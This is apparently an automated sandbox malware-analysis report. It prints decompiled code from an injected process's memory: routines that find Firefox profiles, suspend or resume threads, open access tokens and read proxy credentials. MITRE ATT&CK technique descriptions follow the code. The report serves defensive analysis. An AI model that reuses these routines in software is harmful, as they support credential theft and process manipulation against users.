0x015da758
0x015da764

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 015DA606

Part of subcall function 015E9070: PathCombineW.SHLWAPI(?,?,00000000), ref: 015E90AD

GetFileAttributesW.KERNEL32(?,?,?,?,?,?,00000000), ref: 015DA66B

Part of subcall function 015E6020: wvnsprintfA.SHLWAPI(?,?,?,00000000), ref: 015E604E
Part of subcall function 015E6020: lstrlenA.KERNEL32(00000000), ref: 015E6072

Part of subcall function 015E6C80: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,0000000F,015DB370,?,?,015DA6BC,015DB370,?,00000020,015DB370,0000000F,Profile%u,?), ref: 015E6C96

GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 015DA6D0
GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 015DA6F9

Strings

IsRelative, xrefs: 015DA67D
Mozilla\Firefox, xrefs: 015DA5F8
Path, xrefs: 015DA689
Profile%u, xrefs: 015DA69D
profiles.ini, xrefs: 015DA636

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: PathPrivateProfile$AttributesByteCharCombineFileFolderMultiStringWidelstrlenwvnsprintf
String ID: IsRelative$Mozilla\Firefox$Path$Profile%u$profiles.ini
API String ID: 869645723-3812454639
Opcode ID: fe99c96f3392af289e56f27a9d1a48c9c1d0e9eac377768757dce0fef8e929e9
Instruction ID: be117830e7babcbde326f89e46d518580b37377be84b6af52e6852ba0d88d03c
Opcode Fuzzy Hash: fe99c96f3392af289e56f27a9d1a48c9c1d0e9eac377768757dce0fef8e929e9
Instruction Fuzzy Hash: BF4186B3D0011DAADF20DBE49C48FDF77BDBB45220F4505A6F615EB081E7719A498B60

Uniqueness

Uniqueness Score: 4.01%

Function 015DC117, Relevance: 12.1, APIs: 8, Instructions: 70
threadprocessinjectionUNIQUE

Download Yara Rule

C-Code - Quality: 82%

			E015DC117(intOrPtr _a4) {
				void* _v8;
				int _v12;
				intOrPtr _v28;
				long _v32;
				void* _v40;
				void* _t14;
				void* _t19;
				intOrPtr _t24;
				intOrPtr _t27;
				void* _t32;
				intOrPtr _t33;
				void* _t35;
				intOrPtr _t36;

				_v12 = 0;
				_t36 =  *0x1600130; // 0x0
				if(_t36 != 0) {
					_t27 =  *0x15ffc6c; // 0x598
					_t14 = CreateToolhelp32Snapshot(4, 0);
					_v8 = _t14;
					if(_t14 != 0xffffffff) {
						_t29 =  &_v40;
						_v40 = 0x1c;
						if(Thread32First(_t14,  &_v40) != 0) {
							do {
								if(_v28 != _t27) {
									goto L17;
								}
								_t32 = OpenThread(0x4a, 0, _v32);
								if(_t32 == 0) {
									goto L17;
								}
								_t19 = E015DC0C9(_t29, _t32, _v32, 0);
								_t35 = _t35 + 0xc;
								if(_t19 == 0) {
									L16:
									CloseHandle(_t32);
									goto L17;
								}
								_push(_t32);
								if(_a4 == 0) {
									SuspendThread();
								} else {
									ResumeThread();
								}
								_v12 = 1;
								goto L16;
								L17:
							} while (Thread32Next(_v8,  &_v40) != 0);
							_t33 = _v12;
							L8:
							CloseHandle(_v8);
							_t24 = _t33;
							L4:
							return _t24;
						}
						_t33 = 0;
						goto L8;
					}
					_t24 = 0;
					goto L4;
				}
				return 0;
			}

0x015dc120
0x015dc123
0x015dc129
0x015dc130
0x015dc139
0x015dc13f
0x015dc145
0x015dc14e
0x015dc153
0x015dc161
0x015dc173
0x015dc176
0x00000000
0x00000000
0x015dc184
0x015dc188
0x00000000
0x00000000
0x015dc18f
0x015dc194
0x015dc199
0x015dc1b6
0x015dc1b7
0x00000000
0x015dc1b7
0x015dc19b
0x015dc19f
0x015dc1a9
0x015dc1a1
0x015dc1a1
0x015dc1a1
0x015dc1af
0x00000000
0x015dc1bd
0x015dc1c9
0x015dc1cd
0x015dc165
0x015dc168
0x015dc16e
0x015dc149
0x00000000
0x015dc149
0x015dc163
0x00000000
0x015dc163
0x015dc147
0x00000000
0x015dc147
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 015DC139
Thread32First.KERNEL32(00000000,?), ref: 015DC15A
CloseHandle.KERNEL32(?), ref: 015DC168
OpenThread.KERNEL32(0000004A,00000000,?,00000000,?,7601CE44), ref: 015DC17E
ResumeThread.KERNEL32(00000000), ref: 015DC1A1
SuspendThread.KERNEL32(00000000), ref: 015DC1A9
CloseHandle.KERNEL32(00000000), ref: 015DC1B7
Thread32Next.KERNEL32(?,0000001C), ref: 015DC1C4

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: Thread$CloseHandleThread32$CreateFirstNextOpenResumeSnapshotSuspendToolhelp32
String ID:
API String ID: 2936805061-0
Opcode ID: c1f30213bb70b799c8f5d7b8d83b02b03b562c63c6e584fc718de4be989e6b2d
Instruction ID: b4e734e718e394ab456093556a216b00ea6463a3391a5d539a09470d44e7c841
Opcode Fuzzy Hash: c1f30213bb70b799c8f5d7b8d83b02b03b562c63c6e584fc718de4be989e6b2d
Instruction Fuzzy Hash: 89216371904225EBDB32ABFCDD4899EBAF8BF89351F100559E911EA144E7708A41DB60

Uniqueness

Uniqueness Score: 37.75%

Function 015DE104, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37
stringnetworkUNIQUE

Download Yara Rule

C-Code - Quality: 86%

			E015DE104(void* _a4) {
				long _v8;
				short _v264;
				signed int _t13;
				void* _t15;

				_v8 = 0xff;
				if(HttpQueryInfoW(_a4, 0x2d,  &_v264,  &_v8, 0) != 0) {
					if(lstrcmpW( &_v264, L"POST") != 0) {
						_t13 = lstrcmpW( &_v264, L"GET");
						asm("sbb al, al");
						_t15 =  ~_t13 + 1;
					} else {
						_t15 = 2;
					}
					return _t15;
				} else {
					return 0;
				}
			}

0x015de11f
0x015de12e
0x015de14b
0x015de15d
0x015de161
0x015de163
0x015de14d
0x015de14d
0x015de14d
0x015de167
0x015de130
0x015de133
0x015de133

APIs

HttpQueryInfoW.WININET(?,0000002D,?,?,00000000), ref: 015DE126
lstrcmpW.KERNEL32(?,POST), ref: 015DE147

Strings

GET, xrefs: 015DE151
POST, xrefs: 015DE13B

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: HttpInfoQuerylstrcmp
String ID: GET$POST
API String ID: 635208385-3192705859
Opcode ID: faea7d52d5293f4da1b5aba0b7161fb4648e788bafd3efd9ea026be7459608d0
Instruction ID: 41cec1d584279fae7485b8c6b19648d901353bbc4cbef87e8e310b1e3a7ce63f
Opcode Fuzzy Hash: faea7d52d5293f4da1b5aba0b7161fb4648e788bafd3efd9ea026be7459608d0
Instruction Fuzzy Hash: C2F089B5A40228A7DF20DAF5DD46FDA37BCEB04744F000495AA05EB080E3B0DA459BA0

Uniqueness

Uniqueness Score: 100.00%

Function 015E9150, Relevance: 7.5, APIs: 5, Instructions: 40
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E015E9150(void* __ecx, long _a4) {
				void* _v8;

				if(OpenThreadToken(GetCurrentThread(), _a4, 0,  &_v8) != 0) {
					L10:
					return _v8;
				}
				if(GetLastError() != 0x3f0) {
					while(0 != 0) {
					}
					return 0;
				}
				if(OpenProcessToken(GetCurrentProcess(), _a4,  &_v8) != 0) {
					goto L10;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x015e916d
0x015e91ab
0x00000000
0x015e91ab
0x015e917a
0x015e91a1
0x015e91a5
0x00000000
0x015e91a7
0x015e9193
0x00000000
0x015e919f
0x015e9195
0x015e9199
0x00000000

APIs

GetCurrentThread.KERNEL32(015E9363,00000000,00000008,?,?,015E9363,00000008), ref: 015E915E
OpenThreadToken.ADVAPI32(00000000,?,?,015E9363,00000008), ref: 015E9165
GetLastError.KERNEL32(?,?,015E9363,00000008), ref: 015E916F
GetCurrentProcess.KERNEL32(015E9363,00000008,?,?,015E9363,00000008), ref: 015E9184
OpenProcessToken.ADVAPI32(00000000,?,?,015E9363,00000008), ref: 015E918B

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken$ErrorLast
String ID:
API String ID: 102224034-0
Opcode ID: f2e3f42f059f3463533a46ea2a1dd4e75030d1ea0df56a85269cea7ed6323ad5
Instruction ID: 73ef51aae6362293b3a16fa74953ae78e4ec23956e9d91d52263101faf74db73
Opcode Fuzzy Hash: f2e3f42f059f3463533a46ea2a1dd4e75030d1ea0df56a85269cea7ed6323ad5
Instruction Fuzzy Hash: 98F04F35E04305EBEB2CDAF4980C9AE7BF8BB44189B054818F906CE104E672CA459762

Uniqueness

Uniqueness Score: 0.81%

Function 015D7D1C, Relevance: 6.1, APIs: 4, Instructions: 87
networkstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E015D7D1C(void* __ecx, void* _a4) {
				long _v8;
				long _v12;
				long _v16;
				char _v272;
				void _v528;
				void _v1040;
				int _t32;
				int _t38;
				int _t43;
				int _t49;

				_t56 = __ecx;
				_v16 = 0xff;
				_v12 = 0xff;
				_v8 = 0x1ff;
				E015E5F70(__ecx,  &_v272, 0, 0x100);
				if(InternetQueryOptionA(_a4, 0x1c,  &_v272,  &_v16) != 0) {
					_t32 = lstrlenA( &_v272);
					__eflags = _t32;
					if(_t32 == 0) {
						goto L1;
					}
					E015E5F70(_t56,  &_v528, 0, 0x100);
					_t38 = InternetQueryOptionA(_a4, 0x1d,  &_v528,  &_v12);
					__eflags = _t38;
					if(_t38 == 0) {
						goto L1;
					}
					E015E5F70(_t56,  &_v1040, 0, 0x200);
					_t43 = InternetQueryOptionA(_a4, 0x22,  &_v1040,  &_v8);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L1;
					}
					E015E68B0(_t56,  &_v1040);
					_t49 = E015D7BA0(_t56, __eflags,  &_v1040,  &_v272,  &_v528);
					__eflags = _t49;
					if(_t49 != 0) {
						E015D8877( &_v1040,  &_v272,  &_v528);
					}
					__eflags = 1;
					return 1;
				}
				L1:
				return 0;
			}

0x015d7d1c
0x015d7d2f
0x015d7d32
0x015d7d3e
0x015d7d45
0x015d7d65
0x015d7d75
0x015d7d7b
0x015d7d7d
0x00000000
0x00000000
0x015d7d89
0x015d7da1
0x015d7da7
0x015d7da9
0x00000000
0x00000000
0x015d7db9
0x015d7dd1
0x015d7dd7
0x015d7dd9
0x00000000
0x00000000
0x015d7de2
0x015d7dfc
0x015d7e04
0x015d7e06
0x015d7e1d
0x015d7e22
0x015d7e27
0x00000000
0x015d7e27
0x015d7d67
0x00000000

APIs

InternetQueryOptionA.WININET(?,0000001C,?,?), ref: 015D7D5D
lstrlenA.KERNEL32(?), ref: 015D7D75
InternetQueryOptionA.WININET(?,0000001D,?,?), ref: 015D7DA1
InternetQueryOptionA.WININET(?,00000022,?,000001FF), ref: 015D7DD1

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: InternetOptionQuery$lstrlen
String ID:
API String ID: 2698290815-0
Opcode ID: bddd4b475c880555313916b74a7262ce49f0b5b848785ff5a296151d2d9e1b6f
Instruction ID: d09b4096697db8ad86e32fbee7fa57a0083f0eb9ff9125ecefee0fd4ed03f3e7
Opcode Fuzzy Hash: bddd4b475c880555313916b74a7262ce49f0b5b848785ff5a296151d2d9e1b6f
Instruction Fuzzy Hash: 76310FB6D0021DBAEB20EBA4DC45FDE77BCAF19304F5041A2A615E6141F670D7498FA4

Uniqueness

Uniqueness Score: 7.75%

Function 015DC94E, Relevance: 5.1, APIs: 4, Instructions: 106
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E015DC94E(void* __ecx, intOrPtr _a4, intOrPtr _a8, CHAR* _a12, CHAR* _a16) {
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _t39;
				int _t40;
				char _t42;
				char _t43;
				void* _t65;
				void* _t67;
				int _t72;
				void* _t73;
				void* _t74;
				int _t75;

				_t64 = __ecx;
				_t72 = 0;
				_v20 = 0;
				_v24 = 0;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t39 = E015DC8C7(__ecx, _a4, _a8,  &_v24);
				_v12 = _t39;
				if(_t39 != 0) {
					if(_a16 != 0) {
						_t72 = lstrlenA(_a16);
					}
					_t40 = lstrlenA(_a12);
					_t15 = _v24 + 0x19; // 0x19
					_t73 = _t40 + _t72 + _t15;
					_t42 = E015E5C80(_t64, _t73);
					_pop(_t65);
					_v8 = _t42;
					if(_t42 != 0) {
						_t43 = E015E8330(_t65);
						_v16 = _t43;
						if(_t43 != 0) {
							E015E83A0(_t65, _t43,  *0x1602ec8);
							_pop(_t67);
							_push(_v12);
							_t74 = _t73 - 1;
							if(_a16 == 0) {
								E015E6020(_v8, _t74,  *0x1602f4c, _a12);
							} else {
								_push(_a16);
								E015E6020(_v8, _t74,  *0x1602e30, _a12);
							}
							E015E8420(_v16, _v8);
							E015E8700(_t67,  &_v16);
						} else {
							_v20 = 0xfffffffd;
						}
					} else {
						_v20 = 0xfffffffe;
					}
					E015E5CB0( &_v12, _t62);
					_t75 = 0;
					if(_a16 != 0) {
						_t75 = lstrlenA(_a16);
					}
					E015E5CB0( &_v8, lstrlenA(_a12) + _t75 + _t62 + 0x19);
					return _v20;
				}
				return _t39 | 0xffffffff;
			}

0x015dc94e
0x015dc95c
0x015dc961
0x015dc964
0x015dc967
0x015dc96a
0x015dc96d
0x015dc970
0x015dc978
0x015dc97d
0x015dc992
0x015dc999
0x015dc999
0x015dc99e
0x015dc9a5
0x015dc9a5
0x015dc9aa
0x015dc9af
0x015dc9b0
0x015dc9b5
0x015dc9c0
0x015dc9c5
0x015dc9ca
0x015dc9dc
0x015dc9e2
0x015dc9e3
0x015dc9e6
0x015dc9eb
0x015dca14
0x015dc9ed
0x015dc9ed
0x015dc9fd
0x015dca02
0x015dca22
0x015dca2b
0x015dc9cc
0x015dc9cc
0x015dc9cc
0x015dc9b7
0x015dc9b7
0x015dc9b7
0x015dca38
0x015dca3d
0x015dca44
0x015dca4b
0x015dca4b
0x015dca5d
0x00000000
0x015dca68
0x00000000

APIs

lstrlenA.KERNEL32(015DCBDB,DDE833FF,00000000,?,?,015DB641,015DCBDB,?,?,015DB641,?), ref: 015DC997
lstrlenA.KERNEL32(?,DDE833FF,00000000,?,?,015DB641,015DCBDB,?,?,015DB641,?), ref: 015DC99E
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,015DB641), ref: 015DCA49
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,015DB641), ref: 015DCA50

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 66747c07f31be941887df198beaebb0d4bcaf99ff7015b306de6db07bd2b6960
Instruction ID: 0bb10ad109746d9aa299b08587ae86abcbc35a224c66fcdfed783ae97bb572cc
Opcode Fuzzy Hash: 66747c07f31be941887df198beaebb0d4bcaf99ff7015b306de6db07bd2b6960
Instruction Fuzzy Hash: 73316572C0020AEFDF22DFA8DD058AEBFF9FF94214F14055AE510AA161EB719A20DB51

Uniqueness

Uniqueness Score: 0.02%

Description:	Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Authentication logs, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters.
Tactics:	Execution
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. One example command-line interface on Windows systems is cmd , which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task ).
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation.
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Utilities such as at and schtasks , along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Credential Access, Persistence, Privilege Escalation
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	When operating systems boot up, they can start programs or applications called services that perform background system functions. A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform Privilege Escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command `runas` . Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, Scripting , PowerShell , or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Rootkits are programs that hide the existence of malware by intercepting (i.e., Hooking ) and modifying operating system API calls that supply system information. Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a Hypervisor , Master Boot Record, or the System Firmware .
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Tactics:	Credential Access, Discovery
Data Sources:	Host network interface, Netflow/Enclave netflow, Network device logs, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can use methods of capturing user input for obtaining credentials for Valid Accounts and information Collection that include keylogging and user input field interception.
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Kernel drivers, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report zhAQkCQvME

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Cryptography:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Signature Similarity

Similar Samples

Behavior Graph

Simulations

Behavior and APIs

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Description:	Adversaries may attempt to get a listing of local system or domain accounts.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	### Windows
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP . Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control, Lateral Movement
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre